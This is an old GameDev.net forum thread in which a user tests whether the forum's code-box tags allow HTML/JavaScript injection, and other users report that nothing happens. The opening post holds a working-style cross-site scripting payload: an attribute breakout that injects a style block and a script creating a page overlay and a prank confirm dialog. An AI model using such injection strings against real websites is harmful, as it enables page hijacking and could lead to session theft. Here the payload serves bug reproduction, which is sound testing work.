Jump to content

  • Log In with Google      Sign In   
  • Create Account

We're offering banner ads on our site from just $5!

1. Details HERE. 2. GDNet+ Subscriptions HERE. 3. Ad upload HERE.


Don't forget to read Tuesday's email newsletter for your chance to win a free copy of Construct 2!


Potential HTML/Javascript injection exploit with source tags (3)


Old topic!
Guest, the last post of this topic is over 60 days old and at this point you may not reply in this topic. If you wish to continue this conversation start a new topic.

  • You cannot reply to this topic
4 replies to this topic

#1 fastcall22   Crossbones+   -  Reputation: 4386

Posted 23 June 2012 - 01:02 PM

[source lang="cpp"]"/><style type="text/css">div#trolol { position: absolute; left: 0; top: 0; width: 100%; height: 100%; background-color: rgba(255,128,0,0.5);}</style><script type="text/javascript">function b() { return confirm("You mad, bro?");}function a() { var div = document.createElement("DIV"); div.setAttribute( "id", "trolol" ); div.onclick = b; document.body.appendChild( div );}setTimeout( a, 5000 );</script>[/source]

[source lang="cpp"]const char* str = "maybe two source boxes?";[/source]

If nothing happens, then move along; nothing to see here.

<.<
>.>

Trying to reproduce what happened in this thread: http://www.gamedev.net/topic/626861-sdl-collision-issue/

Okay, THIS time, I got it.
c3RhdGljIGNoYXIgeW91cl9tb21bMVVMTCA8PCA2NF07CnNwcmludGYoeW91cl9tb20sICJpcyBmYXQiKTs=

Sponsor:

#2 Cornstalks   Crossbones+   -  Reputation: 6991

Posted 23 June 2012 - 01:17 PM

I'm not sure what's supposed to happen... nothing happens (at least no confirm boxes appear) for me on OS X with Chrome or Safari. If you're talking about the contents of the source tags appearing at the top with junk, I reported the same thing awhile ago for the mobile version... let me check if it's fixed for mobile.
[ I was ninja'd 71 times before I stopped counting a long time ago ] [ f.k.a. MikeTacular ] [ My Blog ] [ SWFer: Gaplessly looped MP3s in your Flash games ]

#3 Cornstalks   Crossbones+   -  Reputation: 6991

Posted 23 June 2012 - 01:21 PM

Ok, looks like your code messed up the javascript 'case I can't edit that post now. Yeah, that thing I reported still happens for mobile, and I'm assuming it's related to this.
[ I was ninja'd 71 times before I stopped counting a long time ago ] [ f.k.a. MikeTacular ] [ My Blog ] [ SWFer: Gaplessly looped MP3s in your Flash games ]

#4 fastcall22   Crossbones+   -  Reputation: 4386

Posted 23 June 2012 - 01:22 PM

Looks like any HTML-like tags are parsed out of the source box...
c3RhdGljIGNoYXIgeW91cl9tb21bMVVMTCA8PCA2NF07CnNwcmludGYoeW91cl9tb20sICJpcyBmYXQiKTs=

#5 Cornstalks   Crossbones+   -  Reputation: 6991

Posted 23 June 2012 - 01:27 PM

Looks like any HTML-like tags are parsed out of the source box...

Yeah, that happened when we were discussing knackered code pastes... I'm not seeing the injection exploit though...
[ I was ninja'd 71 times before I stopped counting a long time ago ] [ f.k.a. MikeTacular ] [ My Blog ] [ SWFer: Gaplessly looped MP3s in your Flash games ]




Old topic!
Guest, the last post of this topic is over 60 days old and at this point you may not reply in this topic. If you wish to continue this conversation start a new topic.



PARTNERS